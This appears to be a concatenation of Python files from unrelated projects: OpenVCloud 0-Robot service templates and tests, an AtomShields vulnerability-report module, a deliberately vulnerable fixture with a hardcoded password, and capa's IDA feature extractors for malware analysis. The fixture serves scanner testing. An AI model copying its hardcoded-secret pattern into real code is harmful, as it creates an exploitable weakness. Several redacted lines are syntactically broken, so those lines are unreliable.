updated.append(self._update_value('totalIopsSecMax', totalIopsSecMax))
updated.append(self._update_value('readIopsSecMax', readIopsSecMax))
updated.append(self._update_value('writeIopsSecMax', writeIopsSecMax))
updated.append(self._update_value('sizeIopsSec', sizeIopsSec))
if any(updated):
# check that new limits are valid
self._validate_limits()
# apply new limits
self._limit_io()
def _update_value(self, arg, value):
if value is not None:
if isinstance(self.data[arg], type(value)):
if self.data[arg] != value:
self.data[arg] = value
return True
else:
raise TypeError("limit {lim} has type {type}, expected type {expect_type}".format(
lim=arg, type=type(value), expect_type=type(self.data[arg]))
)
return False
def install(self):
"""
Install disk.
If disk @id is present in data: check if disk with id exists and apply limits.
If disk @id is not given: create new disk with given limits.
"""
try:
self.state.check('actions', 'install', 'ok')
return
except StateCheckError:
pass
self.data['location'] = self.space.model['location']
if self.data['diskId']:
# if disk is given in data, check if disk exist
disks = self.account.disks
disk = [disk for disk in disks if disk['id'] == self.data['diskId']]
if not disk:
raise ValueError('Disk with id {} does not exist on account "{}"'.format(
self.data['diskId'], self.account.model['name'])
)
self.data['name'] = disk[0]['name']
else:
self._create()
self.state.set('actions', 'install', 'ok')
def _create(self):
""" Create disk in isolation
"""
data = self.data
# check existence of the disk. If ID field was updated in the service
gid = [location['gid'] for location in self.ovc.locations if location['name'] == data['location']]
if not gid:
raise RuntimeError('location "%s" not found' % data['location'])
data['diskId'] = self.account.disk_create(
name=data['name'],
gid=gid,
description=data['description'],
size=data['size'],
type=data['type'],
)
def uninstall(self):
"""
Uninstall disk. Delete disk if exists.
:param machine_service: name of the service,
managing VM where the disk attached.
Relevant only for attached disks
"""
disks = [disk['id'] for disk in self.account.disks]
if self.data['diskId'] in disks:
if self.data['type'] == 'B':
raise RuntimeError("can't delete boot disk")
self.account.disk_delete(self.data['diskId'], detach=False)
self.state.delete('actions', 'install')
self.data['diskId'] = 0
@property
def config(self):
"""
Return an object with names of vdc, account, and ovc
"""
if self._config is not None:
return self._config
config = {}
# get real vdc name
proxy = self.api.services.get(
template_uid=self.VDC_TEMPLATE, name=self.data['vdc'])
vdc_info = proxy.schedule_action(action='get_info').wait(die=True).result
config['vdc'] = vdc_info['name']
# get account name
proxy = self.api.services.get(
template_uid=self.ACCOUNT_TEMPLATE, name=vdc_info['account'])
account_info = proxy.schedule_action(action='get_info').wait(die=True).result
config['account'] = account_info['name']
# get ovc name
proxy = self.api.services.get(
template_uid=self.OVC_TEMPLATE, name=account_info['openvcloud'])
ovc_info = proxy.schedule_action(action='get_info').wait(die=True).result
config['ovc'] = ovc_info['name']
self._config = config
return self._config
@property
def ovc(self):
""" An ovc connection instance """
if not self._ovc:
self._ovc = j.clients.openvcloud.get(instance=self.config['ovc'])
return self._ovc
@property
def space(self):
""" Return vdc client """
if not self._space:
self._space = self.ovc.space_get(
accountName=self.config['account'],
spaceName=self.config['vdc']
)
return self._space
@property
def account(self):
if not self._account:
self._account = self.space.account
return self._account
def _limit_io(self):
data = self.data
self.ovc.api.cloudapi.disks.limitIO(
diskId=data['diskId'], iops=data['maxIops'], total_bytes_sec=data['totalBytesSec'],
read_bytes_sec=data['readBytesSec'], write_bytes_sec=data['writeBytesSec'],
total_iops_sec=data['totalIopsSec'], read_iops_sec=data['readIopsSec'],
write_iops_sec=data['writeIopsSec'], total_bytes_sec_max=data['totalBytesSecMax'],
read_bytes_sec_max=data['readBytesSecMax'], write_bytes_sec_max=data['writeBytesSecMax'],
total_iops_sec_max=data['totalIopsSecMax'], read_iops_sec_max=data['readIopsSecMax'],
write_iops_sec_max=data['writeIopsSecMax'], size_iops_sec=data['sizeIopsSec']
)
def get_info(self):
""" Retrun disk info if disk is installed """
self.state.check('actions', 'install', 'ok')
return {
'serviceName' : self.name,
'deviceName' : self.data['name'],
'diskId' : self.data['diskId'],
'diskType' : self.data['type'],
'vdc' : self.data['vdc'],
}
```
#### File: templates/sshkey/sshkey.py
```python
import paramiko
from js9 import j
from zerorobot.template.base import TemplateBase
from zerorobot.template.state import StateCheckError
class Sshkey(TemplateBase):
version = '0.0.1'
template_name = "sshkey"
def __init__(self, name, guid=None, data=None):
super().__init__(name=name, guid=guid, data=data)
def validate(self):
"""
Implements 0-Robot validate
Validates the sshkey service
"""
# validate sshkey name
if not self.data['name']:
raise ValueError('name is required')
# validate passphrase
if not self.data['passphrase']:
raise ValueError('passphrase is required')
if len(self.data['passphrase']) < 5:
raise ValueError('passphrase must be min of 5 characters')
def install(self):
"""
Installs the ssh key
"""
try:
self.state.check('actions', 'install', 'ok')
return
except StateCheckError:
pass
dir = self.data['dir']
passphrase = self.data['passphrase']
name = self.data['name']
path = j.sal.fs.joinPaths(dir, name)
if not j.sal.fs.exists(path):
j.clients.sshkey.key_generate(
path, passphrase=<PASSWORD>phrase, overwrite=True, returnObj=False)
else:
paramiko.RSAKey.from_private_key_file(path, password=passphrase)
# load key to ssh-agent
self._get_key().load()
self.state.set('actions', 'install', 'ok')
def uninstall(self):
"""
Uninstalls the sshkey client
Also deletes the key
"""
key = self._get_key()
key.delete()
self.state.delete('actions', 'install')
def _get_key(self):
"""
returns an SSHKey instance of provided key in provided path
"""
path = j.sal.fs.joinPaths(self.data['dir'], self.data['name'])
return j.clients.sshkey.get(
self.data['name'],
create=True,
data={
'path': path,
'passphrase_': self.data['passphrase'],
},
)
def get_info(self):
"""
Return sshkey info
"""
self.state.check('actions', 'install', 'ok')
return {
'name' : self.data['name'],
'dir' : self.data['dir'],
}
```
#### File: templates/sshkey/test_sshkey.py
```python
from js9 import j
import os
from unittest import TestCase
from unittest import mock
from zerorobot import config, template_collection
class TestSshKey(TestCase):
def setUp(self):
config.DATA_DIR = '/tmp'
self.type = template_collection._load_template(
"https://github.com/openvcloud/0-templates",
os.path.dirname(__file__)
)
def tearDown(self):
mock.patch.stopall()
@mock.patch.object(j.clients, '_sshkey')
def test_create(self, ssh):
dir = '/tmp'
passphrase = '<PASSWORD>'
sshkeyname = 'id_test'
name = 'test'
data = {'name': sshkeyname, 'dir': dir, 'passphrase': <PASSWORD>}
service = self.type(name, None, data)
service.validate()
service.install()
dir = '%s/%s' % (dir, sshkeyname)
ssh.key_generate.assert_called_once_with(
dir,
passphrase=passphrase,
overwrite=True,
returnObj=False
)
ssh.get.assert_called_once_with(
sshkeyname,
create=True,
data={
'path': dir,
'passphrase_': <PASSWORD>,
}
)
@mock.patch.object(j.clients, '_sshkey')
def test_create_default_dir(self, ssh):
dir = '/root/tmp'
passphrase = '<PASSWORD>'
sshkeyname = 'id_test'
name = 'test'
data = {'name': sshkeyname, 'dir': dir, 'passphrase': passphrase}
service = self.type(name, None, data)
service.validate()
service.install()
dir = '%s/%s' % (dir, sshkeyname)
ssh.key_generate.assert_called_once_with(
dir,
passphrase=<PASSWORD>phrase,
overwrite=True,
returnObj=False
)
ssh.get.assert_called_once_with(
sshkeyname,
create=True,
data={
'path': dir,
'passphrase_': <PASSWORD>,
}
)
@mock.patch.object(j.clients, '_sshkey')
def test_create_bad_pass(self, ssh):
dir = '/root/.ssh'
passphrase = '<PASSWORD>'
name = 'test'
service = self.type(name, None, {'passphrase': passphrase})
with self.assertRaises(ValueError):
service.validate()
ssh.key_generate.assert_not_called()
ssh.get.assert_not_called()
```
#### File: templates/zrobot/zrobot.py
```python
from js9 import j
from zerorobot.template.base import TemplateBase
from zerorobot.template.state import StateCheckError
import gevent
class Zrobot(TemplateBase):
version = '0.0.1'
template_name = "zrobot"
NODE_TEMPLATE = 'github.com/openvcloud/0-templates/node/0.0.1'
DOCKER_IMAGE = 'jumpscale/0-robot:latest'
def __init__(self, name, guid=None, data=None):
super().__init__(name=name, guid=guid, data=data)
self._ovc = None
self._account = None
self._space = None
def validate(self):
for key in ['node', 'port']:
if not self.data[key]:
raise ValueError('%s is required' % key)
# validate accounts
nodes = self.api.services.find(template_uid=self.NODE_TEMPLATE, name=self.data['node'])
if len(nodes) != 1:
raise RuntimeError('found %s nodes, requires exactly one' % len(nodes))
def _prepare_repos(self, prefab, base):
for dir in ['data', 'config', 'ssh']:
prefab.core.dir_ensure(j.sal.fs.joinPaths(base, dir))
for dir in ['data', 'config']:
prefab.core.run('cd %s && git init' % j.sal.fs.joinPaths(base, dir))
key_dir = j.sal.fs.joinPaths(base, 'ssh')
if not prefab.core.exists('%s/id_rsa' % key_dir):
prefab.core.run('ssh-keygen -b 2048 -t rsa -f %s/id_rsa -q -N ""' % key_dir)
@property
def node(self):
nodes = self.api.services.find(template_uid=self.NODE_TEMPLATE, name=self.data['node'])
return nodes[0]
def install(self, force=False):
try:
self.state.check('actions', 'install', 'ok')
if not force:
return
except StateCheckError:
pass
node = j.tools.nodemgr.get(self.data['node'])
prefab = node.prefab
prefab.virtualization.docker.install()
prefab.core.run('docker rm -vf %s' % self.name, die=False)
prefab.core.run('docker pull %s' % self.DOCKER_IMAGE)
base = '/opt/zrobot'
self._prepare_repos(prefab, base)
cfg = j.sal.fs.fileGetContents(
j.sal.fs.joinPaths(j.sal.fs.getDirName(__file__), 'jumpscale9.toml')
)
prefab.core.file_write(
j.sal.fs.joinPaths(base, 'jumpscale9.toml'),
cfg.format(config=j.sal.fs.joinPaths(base, 'config'))
)
templates = ''
for template in self.data['templates']:
templates += ' -T %s' % template
prefab.core.run('''\
docker run -d --name {name} \
-v {base}/data:/opt/code/github/zrobot/data \
-v {base}/config:/opt/code/github/zrobot/config \
-v {base}/ssh:/root/.ssh \
-v {base}/jumpscale9.toml:/root/js9host/cfg/jumpscale9.toml \
-p 6600:6600 \
{image} \
zrobot server start \
-C <EMAIL>:zrobot/config -D [email protected]:zrobot/data \
{templates}
'''.format(
name=self.name,
base=base,
image=self.DOCKER_IMAGE,
templates=templates
))
# expose port forward
self.node.schedule_action(
'portforward_create',
{
'ports': [{
'source': self.data['port'],
'destination': 6600,
}]
}
)
for i in range(10):
if j.sal.nettools.tcpPortConnectionTest(node.addr, self.data['port']):
break
gevent.sleep(3)
else:
raise Exception('can not connect to robot "%s"' % self.name)
j.clients.zrobot.get(
self.name,
create=True,
data={
'url': 'http://%s:%s' % (node.addr, self.data['port'])
}
)
self.state.set('actions', 'install', 'ok')
```
#### File: ovc_tests/a_basic/accounts_tests.py
```python
import unittest
from framework.ovc_utils.utils import OVC_BaseTest
from random import randint
from JumpScale9Lib.clients.portal.PortalClient import ApiError
import time
class accounts(OVC_BaseTest):
def __init__(self, *args, **kwargs):
super(accounts, self).__init__(*args, **kwargs)
def setUp(self):
super(accounts, self).setUp()
self.acc1 = self.random_string()
self.acc1_name = self.random_string()
self.vdcuser = self.random_string()
self.vdcuser_name = self.random_string()
self.vdcusers[self.vdcuser] = {'name': self.vdcuser_name,
'openvcloud': self.openvcloud,
'provider': 'itsyouonline',
'email': '%s<EMAIL>' % self.random_string(),
'groups': ['user']}
self.accounts = dict()
self.temp_actions = {'openvcloud': {'actions': ['install']},
'account': {'actions': ['install']},
'vdcuser': {'actions': ['install']}}
self.CLEANUP["accounts"].append(self.acc1)
@unittest.skip('https://github.com/openvcloud/0-templates/issues/117')
def test001_create_account_with_wrong_params(self):
""" ZRT-OVC-001
*Test case for creating account with different or missing parameters*
**Test Scenario:**
#. Create an account without providing an account name parameter, should fail.
#. Create an account without providing openvcloud parameter, should fail.
#. Create an account with providing non existing openvcloud value, should fail.
"""
self.log('%s STARTED' % self._testID)
self.log('Create an account without providing an account name parameter, should fail.')
self.accounts[self.acc1] = {}
res = self.create_account(openvcloud=self.openvcloud, vdcusers=self.vdcusers,
accounts=self.accounts, temp_actions=self.temp_actions)
self.assertEqual(res, '"name" is required')
self.log('Create an account without providing openvcloud parameter, should fail')
self.accounts[self.acc1] = {'name': self.random_string()}
res = self.create_account(openvcloud=self.openvcloud, vdcusers=self.vdcusers,
accounts=self.accounts, temp_actions=self.temp_actions)
self.assertEqual(res, '"openvcloud" is required')
self.log('Create an account with providing wrong openvcloud value, should fail.')
self.accounts[self.acc1] = {'name': self.random_string(),
'openvcloud': self.random_string()}
res = self.create_account(openvcloud=self.openvcloud, vdcusers=self.vdcusers,
accounts=self.accounts, temp_actions=self.temp_actions)
self.assertEqual(res, 'found 0 openvcloud connections, requires exactly 1')
self.log('%s ENDED' % self._testID)
def test002_create_account_with_correct_params(self):
""" ZRT-OVC-002
*Test case for creating account with correct parameters*
**Test Scenario:**
#. Create two accounts, should succeed.
#. Check if the 1st account parameters are reflected correctly on OVC.
#. Check if the 2nd accound was created, should succeed.
"""
self.log('%s STARTED' % self._testID)
CU_D = randint(15, 30)
CU_C = randint(15, 30)
CU_I = randint(15, 30)
CU_M = randint(15, 30)
self.accounts[self.acc1] = {'openvcloud': self.openvcloud,
'name': self.acc1_name,
'maxMemoryCapacity': CU_M,
'maxCPUCapacity': CU_C, 'maxVDiskCapacity': CU_D,
'maxNumPublicIP': CU_I
}
self.acc2 = self.random_string()
account2_name = self.random_string()
self.accounts[self.acc2] = {'openvcloud': self.openvcloud, 'name': account2_name }
self.CLEANUP["accounts"].append(self.acc2)
self.log('Create two accounts, should succeed')
res = self.create_account(openvcloud=self.openvcloud, vdcusers=self.vdcusers,
accounts=self.accounts, temp_actions=self.temp_actions)
self.assertEqual(type(res), type(dict()))
self.wait_for_service_action_status(self.acc1, res[self.acc1]['install'])
self.wait_for_service_action_status(self.acc2, res[self.acc2]['install'])
self.log('Check if the 1st account parameters are reflected correctly on OVC')
account = self.get_account(self.acc1_name)
self.assertEqual(account['status'], 'CONFIRMED')
self.assertEqual(account['resourceLimits']['CU_D'], CU_D)
self.assertEqual(account['resourceLimits']['CU_C'], CU_C)
self.assertEqual(account['resourceLimits']['CU_I'], CU_I)
self.assertEqual(account['resourceLimits']['CU_M'], CU_M)
self.log('Check if the 2nd accound was created, should succeed.')
account = self.get_account(account2_name)
self.assertEqual(account['status'], 'CONFIRMED')
self.log('%s ENDED' % self._testID)
def test003_update_account__params(self):
""" ZRT-OVC-003
*Test case for updating account's parameters*
**Test Scenario:**
#. Create an account, should succeed
#. Check if the account parameters are reflected correctly on OVC.
#. Update some parameters and make sure it is updated.
"""
self.log('%s STARTED' % self._testID)
CU_D = randint(15, 30)
CU_C = randint(15, 30)
CU_I = randint(15, 30)
CU_M = randint(15, 30)
self.accounts[self.acc1] = {'name': self.acc1_name, 'openvcloud': self.openvcloud,
'maxMemoryCapacity': CU_M, 'maxCPUCapacity': CU_C,
'maxVDiskCapacity': CU_D, 'maxNumPublicIP': CU_I}
self.log('Create an account, should succeed')
res = self.create_account(openvcloud=self.openvcloud, vdcusers=self.vdcusers,
accounts=self.accounts, temp_actions=self.temp_actions)
self.assertEqual(type(res), type(dict()))
self.wait_for_service_action_status(self.acc1, res[self.acc1]['install'])
self.log('Check if the account parameters are reflected correctly on OVC')
account = self.get_account(self.acc1_name)
self.assertEqual(account['status'], 'CONFIRMED')
self.log('Update some parameters and make sure it is updated')
self.temp_actions['account'] = {'actions': ['update'],
'args': {"maxMemoryCapacity": CU_M - 1, "maxCPUCapacity": CU_C - 1,
"maxVDiskCapacity": CU_D - 1, "maxNumPublicIP": CU_I - 1}}
self.accounts[self.acc1] = {'openvcloud': self.openvcloud}
res = self.create_account(openvcloud=self.openvcloud, vdcusers=self.vdcusers,
accounts=self.accounts, temp_actions=self.temp_actions)
self.assertEqual(type(res), type(dict()))
self.wait_for_service_action_status(self.acc1, res[self.acc1]['update'])
account = self.get_account(self.acc1_name)
self.assertEqual(account['resourceLimits']['CU_D'], CU_D - 1)
self.assertEqual(account['resourceLimits']['CU_C'], CU_C - 1)
self.assertEqual(account['resourceLimits']['CU_I'], CU_I - 1)
self.assertEqual(account['resourceLimits']['CU_M'], CU_M - 1)
self.log('%s ENDED' % self._testID)
def test004_account_add_delete_user(self):
""" ZRT-OVC-004
*Test case for updating account with fake user*
**Test Scenario:**
#. Create an account (A1).
#. Add an existing user to A1, should succeed.
#. Delete an existing user from A1, should succeed.
"""
self.log('%s STARTED' % self._testID)
self.accounts[self.acc1] = {'name': self.acc1_name, 'openvcloud': self.openvcloud}
self.log('Create an account, should succeed')
res = self.create_account(openvcloud=self.openvcloud, vdcusers=self.vdcusers,
accounts=self.accounts, temp_actions=self.temp_actions)
self.assertTrue(type(res), type(dict()))
self.wait_for_service_action_status(self.acc1, res[self.acc1]['install'])
self.log('Add an existing user to A1, should succeed.')
self.temp_actions['account']['args'] = {'vdcuser': self.vdcuser, 'accesstype': 'R'}
self.temp_actions['account']['actions'] = ['user_authorize']
res = self.create_account(openvcloud=self.openvcloud, vdcusers=self.vdcusers,
accounts=self.accounts, temp_actions=self.temp_actions)
self.assertEqual(type(res), type(dict()))
self.wait_for_service_action_status(self.acc1, res[self.acc1]['user_authorize'])
account = self.get_account(self.acc1_name)
self.assertIn('%s@itsyouonline' % self.vdcuser_name,
[user['userGroupId'] for user in account['acl']])
self.log('Delete an existing user from A1, should succeed.')
self.temp_actions['account']['actions'] = ['user_unauthorize']
self.temp_actions['account']['args'] = {'vdcuser': self.vdcuser}
res = self.create_account(openvcloud=self.openvcloud, vdcusers=self.vdcusers,
accounts=self.accounts, temp_actions=self.temp_actions)
self.assertEqual(type(res), type(dict()))
self.wait_for_service_action_status(self.acc1, res[self.acc1]['user_unauthorize'])
account = self.get_account(self.acc1_name)
self.assertNotIn('%s@itsyouonline' % self.vdcuser_name,
[user['userGroupId'] for user in account['acl']])
self.log('%s ENDED' % self._testID)
def test005_get_account_info(self):
""" ZRT-OVC-022
*Test case for getting account info*
**Test Scenario:**
#. Create an account (A1).
#. Get A1 and check its info.
"""
self.log('%s STARTED' % self._testID)
self.log('Create an account (A1)')
openvcloud_service_name = self.random_string()
ovc = self.robot.services.create(
template_uid="{}/openvcloud/{}".format(self.repo, self.version),
service_name=openvcloud_service_name,
data={'name': self.random_string(),
'location': self.location,
'address': self.env,
'token': self.iyo_jwt()}
)
ovc.schedule_action('install')
account_service_name = self.random_string()
account_name = self.random_string()
account = self.robot.services.create(
template_uid="{}/account/{}".format(self.repo, self.version),
service_name=account_service_name,
data={'name': account_name, 'openvcloud': openvcloud_service_name}
)
account.schedule_action('install')
self.log('Get A1 and check its info')
acc_info = account.schedule_action('get_info').wait(die=True).result
self.assertEqual(account_name, acc_info['name'])
self.assertEqual(openvcloud_service_name, acc_info['openvcloud'])
self.assertEqual('CXDRAU', acc_info['users'][0]['accesstype'])
ovc.schedule_action('uninstall')
account.schedule_action('uninstall')
account.delete()
ovc.delete()
self.log('%s ENDED' % self._testID)
def test006_set_vdcuser_groups(self):
""" ZRT-OVC-023
*Test case for setting vdcuser groups*
**Test Scenario:**
#. Create vdc user, should succeed.
#. Set user groups and check if it was set.
"""
self.log('%s STARTED' % self._testID)
self.log('Create vdc user, should succeed')
openvcloud_service_name = self.random_string()
ovc = self.robot.services.create(
template_uid="{}/openvcloud/{}".format(self.repo, self.version),
service_name=openvcloud_service_name,
data={'name': self.random_string(),
'location': self.location,
'address': self.env,
'token': self.iyo_jwt()}
)
ovc.schedule_action('install')
vdcuser_service_name = self.random_string()
vdcuser_name = self.random_string()
vdcuser = self.robot.services.create(
template_uid="github.com/openvcloud/0-templates/vdcuser/0.0.1",
service_name=vdcuser_service_name,
data={'name': vdcuser_name,
'openvcloud': openvcloud_service_name,
'email': <EMAIL>'.format(self.random_string())}
)
vdcuser.schedule_action('install')
self.log('Set user groups and check if it was set')
vdcuser.schedule_action('groups_set', {'groups': ['level1', 'level2']})
time.sleep(12)
user = self.ovc_client.api.system.usermanager.userget(name='{}<EMAIL>'.<EMAIL>(vdcuser_<EMAIL>))
self.assertIn('level1', user['groups'])
self.assertIn('level2', user['groups'])
self.log('Delete vdcuser, should succeed ')
vdcuser.schedule_action('uninstall')
try:
self.ovc_client.api.system.usermanager.userget(name='{}@its<EMAIL>'.format(vdcuser_name))
except ApiError as e:
self.assertEqual(e.response.status_code, 404)
self.log('%s ENDED' % self._testID)
``` |
{
"source": "5l1v3r1/AtomShields",
"score": 3
} |
#### File: atomshields/reports/http.py
```python
from atomshields.reports.base import *
import requests, json
class HttpReport(GenericReport):
"""
This module sends all information about vulnerabilities to an endpoint via an http request.
Attributes:
NAME (str): Name of the module.
DESCRIPTION (str): Description of the functionality of the module.
CONFIG (dict): Default values of the module configuration.
"""
NAME = "http"
DESCRIPTION = """Envia los datos de las vulnerabilidades a un endpoint HTTP"""
CONFIG = {
"enabled": False,
"url": "<your_endpoint>",
"method": "post",
"use_proxy": False,
"proxy": "http://127.0.0.1:8080"
}
def __init__(self, *args, **kwargs):
"""
Class constuctor. Must call parent constructor
"""
super(HttpReport, self).__init__(*args, **kwargs)
@report
def run(self):
"""
Method executed dynamically by framework. This method will do a http request to
endpoint setted into config file with the issues and other data.
"""
options = {}
if bool(self.config['use_proxy']):
options['proxies'] = {"http": self.config['proxy'], "https": self.config['proxy']}
options["url"] = self.config['url']
options["data"] = {"issues": json.dumps(map(lambda x: x.__todict__(), self.issues))}
if 'get' == self.config['method'].lower():
requests.get(**options)
else:
requests.post(**options)
```
#### File: dataset/vulnerable/file_with_pass.py
```python
PASSWORD = '1'
def sample():
return PASSWORD
if __name__ == "__main__":
sample()
``` |
{
"source": "5l1v3r1/capa",
"score": 2
} |
#### File: extractors/ida/insn.py
```python
import idc
import idaapi
import idautils
import capa.features.extractors.helpers
import capa.features.extractors.ida.helpers
from capa.features import ARCH_X32, ARCH_X64, MAX_BYTES_FEATURE_SIZE, Bytes, String, Characteristic
from capa.features.insn import Number, Offset, Mnemonic
def get_arch(ctx):
"""
fetch the ARCH_* constant for the currently open workspace.
via <NAME>/@tmr232
https://reverseengineering.stackexchange.com/a/11398/17194
"""
if "arch" not in ctx:
info = idaapi.get_inf_structure()
if info.is_64bit():
ctx["arch"] = ARCH_X64
elif info.is_32bit():
ctx["arch"] = ARCH_X32
else:
raise ValueError("unexpected architecture")
return ctx["arch"]
def get_imports(ctx):
if "imports_cache" not in ctx:
ctx["imports_cache"] = capa.features.extractors.ida.helpers.get_file_imports()
return ctx["imports_cache"]
def check_for_api_call(ctx, insn):
""" check instruction for API call """
if not idaapi.is_call_insn(insn):
return
for ref in idautils.CodeRefsFrom(insn.ea, False):
info = get_imports(ctx).get(ref, ())
if info:
yield "%s.%s" % (info[0], info[1])
else:
f = idaapi.get_func(ref)
# check if call to thunk
# TODO: first instruction might not always be the thunk
if f and (f.flags & idaapi.FUNC_THUNK):
for thunk_ref in idautils.DataRefsFrom(ref):
# TODO: always data ref for thunk??
info = get_imports(ctx).get(thunk_ref, ())
if info:
yield "%s.%s" % (info[0], info[1])
def extract_insn_api_features(f, bb, insn):
""" parse instruction API features
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
example:
call dword [0x00473038]
"""
for api in check_for_api_call(f.ctx, insn):
for (feature, ea) in capa.features.extractors.helpers.generate_api_features(api, insn.ea):
yield feature, ea
def extract_insn_number_features(f, bb, insn):
""" parse instruction number features
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
example:
push 3136B0h ; dwControlCode
"""
if idaapi.is_ret_insn(insn):
# skip things like:
# .text:0042250E retn 8
return
if capa.features.extractors.ida.helpers.is_sp_modified(insn):
# skip things like:
# .text:00401145 add esp, 0Ch
return
for op in capa.features.extractors.ida.helpers.get_insn_ops(insn, target_ops=(idaapi.o_imm, idaapi.o_mem)):
if op.type == idaapi.o_imm:
const = capa.features.extractors.ida.helpers.mask_op_val(op)
else:
const = op.addr
if not idaapi.is_mapped(const):
yield Number(const), insn.ea
yield Number(const, arch=get_arch(f.ctx)), insn.ea
def extract_insn_bytes_features(f, bb, insn):
""" parse referenced byte sequences
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
example:
push offset iid_004118d4_IShellLinkA ; riid
"""
ref = capa.features.extractors.ida.helpers.find_data_reference_from_insn(insn)
if ref != insn.ea:
extracted_bytes = capa.features.extractors.ida.helpers.read_bytes_at(ref, MAX_BYTES_FEATURE_SIZE)
if extracted_bytes and not capa.features.extractors.helpers.all_zeros(extracted_bytes):
yield Bytes(extracted_bytes), insn.ea
def extract_insn_string_features(f, bb, insn):
""" parse instruction string features
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
example:
push offset aAcr ; "ACR > "
"""
ref = capa.features.extractors.ida.helpers.find_data_reference_from_insn(insn)
if ref != insn.ea:
found = capa.features.extractors.ida.helpers.find_string_at(ref)
if found:
yield String(found), insn.ea
def extract_insn_offset_features(f, bb, insn):
""" parse instruction structure offset features
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
example:
.text:0040112F cmp [esi+4], ebx
"""
for op in capa.features.extractors.ida.helpers.get_insn_ops(insn, target_ops=(idaapi.o_phrase, idaapi.o_displ)):
if capa.features.extractors.ida.helpers.is_op_stack_var(insn.ea, op.n):
continue
p_info = capa.features.extractors.ida.helpers.get_op_phrase_info(op)
op_off = p_info.get("offset", 0)
if idaapi.is_mapped(op_off):
# Ignore:
# mov esi, dword_1005B148[esi]
continue
# I believe that IDA encodes all offsets as two's complement in a u32.
# a 64-bit displacement isn't a thing, see:
# https://stackoverflow.com/questions/31853189/x86-64-assembly-why-displacement-not-64-bits
op_off = capa.features.extractors.helpers.twos_complement(op_off, 32)
yield Offset(op_off), insn.ea
yield Offset(op_off, arch=get_arch(f.ctx)), insn.ea
def contains_stack_cookie_keywords(s):
""" check if string contains stack cookie keywords
Examples:
xor ecx, ebp ; StackCookie
mov eax, ___security_cookie
"""
if not s:
return False
s = s.strip().lower()
if "cookie" not in s:
return False
return any(keyword in s for keyword in ("stack", "security"))
def bb_stack_cookie_registers(bb):
""" scan basic block for stack cookie operations
yield registers ids that may have been used for stack cookie operations
assume instruction that sets stack cookie and nzxor exist in same block
and stack cookie register is not modified prior to nzxor
Example:
.text:004062DA mov eax, ___security_cookie <-- stack cookie
.text:004062DF mov ecx, eax
.text:004062E1 mov ebx, [esi]
.text:004062E3 and ecx, 1Fh
.text:004062E6 mov edi, [esi+4]
.text:004062E9 xor ebx, eax
.text:004062EB mov esi, [esi+8]
.text:004062EE xor edi, eax <-- ignore
.text:004062F0 xor esi, eax <-- ignore
.text:004062F2 ror edi, cl
.text:004062F4 ror esi, cl
.text:004062F6 ror ebx, cl
.text:004062F8 cmp edi, esi
.text:004062FA jnz loc_40639D
TODO: this is expensive, but necessary?...
"""
for insn in capa.features.extractors.ida.helpers.get_instructions_in_range(bb.start_ea, bb.end_ea):
if contains_stack_cookie_keywords(idc.GetDisasm(insn.ea)):
for op in capa.features.extractors.ida.helpers.get_insn_ops(insn, target_ops=(idaapi.o_reg,)):
if capa.features.extractors.ida.helpers.is_op_write(insn, op):
# only include modified registers
yield op.reg
def is_nzxor_stack_cookie(f, bb, insn):
""" check if nzxor is related to stack cookie """
if contains_stack_cookie_keywords(idaapi.get_cmt(insn.ea, False)):
# Example:
# xor ecx, ebp ; StackCookie
return True
stack_cookie_regs = tuple(bb_stack_cookie_registers(bb))
if any(op_reg in stack_cookie_regs for op_reg in (insn.Op1.reg, insn.Op2.reg)):
# Example:
# mov eax, ___security_cookie
# xor eax, ebp
return True
return False
def extract_insn_nzxor_characteristic_features(f, bb, insn):
""" parse instruction non-zeroing XOR instruction
ignore expected non-zeroing XORs, e.g. security cookies
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
"""
if insn.itype != idaapi.NN_xor:
return
if capa.features.extractors.ida.helpers.is_operand_equal(insn.Op1, insn.Op2):
return
if is_nzxor_stack_cookie(f, bb, insn):
return
yield Characteristic("nzxor"), insn.ea
def extract_insn_mnemonic_features(f, bb, insn):
""" parse instruction mnemonic features
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
"""
yield Mnemonic(insn.get_canon_mnem()), insn.ea
def extract_insn_peb_access_characteristic_features(f, bb, insn):
""" parse instruction peb access
fs:[0x30] on x86, gs:[0x60] on x64
TODO:
IDA should be able to do this..
"""
if insn.itype not in (idaapi.NN_push, idaapi.NN_mov):
return
if all(map(lambda op: op.type != idaapi.o_mem, insn.ops)):
# try to optimize for only memory references
return
disasm = idc.GetDisasm(insn.ea)
if " fs:30h" in disasm or " gs:60h" in disasm:
# TODO: replace above with proper IDA
yield Characteristic("peb access"), insn.ea
def extract_insn_segment_access_features(f, bb, insn):
""" parse instruction fs or gs access
TODO:
IDA should be able to do this...
"""
if all(map(lambda op: op.type != idaapi.o_mem, insn.ops)):
# try to optimize for only memory references
return
disasm = idc.GetDisasm(insn.ea)
if " fs:" in disasm:
# TODO: replace above with proper IDA
yield Characteristic("fs access"), insn.ea
if " gs:" in disasm:
# TODO: replace above with proper IDA
yield Characteristic("gs access"), insn.ea
def extract_insn_cross_section_cflow(f, bb, insn):
""" inspect the instruction for a CALL or JMP that crosses section boundaries
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
"""
for ref in idautils.CodeRefsFrom(insn.ea, False):
if ref in get_imports(f.ctx).keys():
# ignore API calls
continue
if not idaapi.getseg(ref):
# handle IDA API bug
continue
if idaapi.getseg(ref) == idaapi.getseg(insn.ea):
continue
yield Characteristic("cross section flow"), insn.ea
def extract_function_calls_from(f, bb, insn):
""" extract functions calls from features
most relevant at the function scope, however, its most efficient to extract at the instruction scope
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
"""
if idaapi.is_call_insn(insn):
for ref in idautils.CodeRefsFrom(insn.ea, False):
yield Characteristic("calls from"), ref
def extract_function_indirect_call_characteristic_features(f, bb, insn):
""" extract indirect function calls (e.g., call eax or call dword ptr [edx+4])
does not include calls like => call ds:dword_ABD4974
most relevant at the function or basic block scope;
however, its most efficient to extract at the instruction scope
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
"""
